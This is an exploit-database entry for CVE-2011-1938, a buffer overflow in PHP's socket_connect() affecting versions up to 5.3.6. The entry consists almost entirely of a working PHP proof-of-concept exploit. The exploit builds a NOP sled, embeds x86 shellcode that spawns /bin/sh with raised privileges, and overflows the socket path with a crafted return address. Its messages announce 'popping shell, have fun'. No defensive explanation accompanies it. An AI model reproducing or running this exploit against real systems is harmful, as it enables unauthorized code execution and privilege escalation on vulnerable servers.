Lucene search

K
seebugRootSSV:71717
HistoryJul 01, 2014 - 12:00 a.m.

PHP <= 5.3.5 socket_connect() Buffer Overflow Vulnerability

2014-07-0100:00:00
Root
www.seebug.org
44

0.019 Low

EPSS

Percentile

88.4%

No description provided by source.


                                                &#60;?php
// Credit: Mateusz Kocielski, Marek Kroemeke and Filip Palian 
// Affected Versions: 5.3.3-5.3.6 

echo &#34;[+] CVE-2011-1938&#34;;
echo &#34;[+] there we go...\n&#34;;
define(&#39;EVIL_SPACE_ADDR&#39;, &#34;\xff\xff\xee\xb3&#34;);
define(&#39;EVIL_SPACE_SIZE&#39;, 1024*1024*8);
$SHELLCODE = 
        &#34;\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0&#34;.
        &#34;\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1&#34;.
        &#34;\xcd\x80&#34;;
echo &#34;[+] creating the sled.\n&#34;;

$CODE = str_repeat(&#34;\x90&#34;, EVIL_SPACE_SIZE);
for ($i = 0, $j = EVIL_SPACE_SIZE - strlen($SHELLCODE) - 1 ;
        $i &#60; strlen($SHELLCODE) ; $i++, $j++) {
$CODE[$j] = $SHELLCODE[$i];
}

$b = str_repeat(&#34;A&#34;, 196).EVIL_SPACE_ADDR;
$var79 = socket_create(AF_UNIX, SOCK_STREAM, 1);
echo &#34;[+] popping shell, have fun (if you picked the right address...)\n&#34;;
$var85 = socket_connect($var79,$b);
?&#62;